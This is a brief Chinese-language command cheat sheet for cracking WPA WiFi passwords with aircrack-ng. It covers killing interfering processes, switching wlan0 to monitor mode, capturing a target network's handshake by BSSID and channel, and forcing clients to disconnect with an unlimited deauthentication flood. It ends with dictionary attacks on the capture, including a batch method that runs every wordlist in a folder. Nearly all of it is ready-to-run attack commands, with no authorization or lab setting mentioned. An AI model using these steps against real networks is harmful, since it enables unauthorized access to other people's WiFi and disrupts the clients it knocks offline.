检查并杀死干扰进程

airmon-ng check kill

启动监听模式

airmon-ng start wlan0

扫描AP，记下目标BSSID和信道

airodump-ng wlan0

查看无线网卡名称（如 wlan0）

ip addr show

关闭网卡

ip link set wlan0 down

开启监听模式

iwconfig wlan0 mode monitor

重启网卡

ip link set wlan0 up

验证监听模式（显示 Mode:Monitor 即为成功）

iwconfig wlan0

扫描附近 WiFi 信号

airodump-ng wlan0

定向抓握手包（仅抓目标 WiFi 的连接认证包）

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w ~/wifi_handshake wlan0
解释：airodump-ng -c [信道] --bssid [BSSID] -w [保存路径] wlan0

强制客户端重连（加速抓握手包）

aireplay-ng --deauth 0 -a [BSSID] wlan0

确认抓取的.cap文件包含完整握手包，否则跑字典无意义

aircrack-ng /home/soft/桌面/cap/02.cap
成功标志：输出中显示 1 handshake（代表握手包有效）

跑字典

aircrack-ng -w /home/soft/桌面/cap/hy.txt -b 82:C8:BF:80:83:1E /home/soft/桌面/cap/02.cap
aircrack-ng -w /home/soft/桌面/cap/*.txt -b 82:C8:BF:80:83:1E /home/soft/桌面/cap/02.cap
批量字典使用方法：
find /home/soft/桌面/cap/wpa/ -type f -name "*.txt" | xargs -n 1 aircrack-ng -b F0:AB:90:E6:46:3C /home/soft/桌面/cap/1/02.cap -w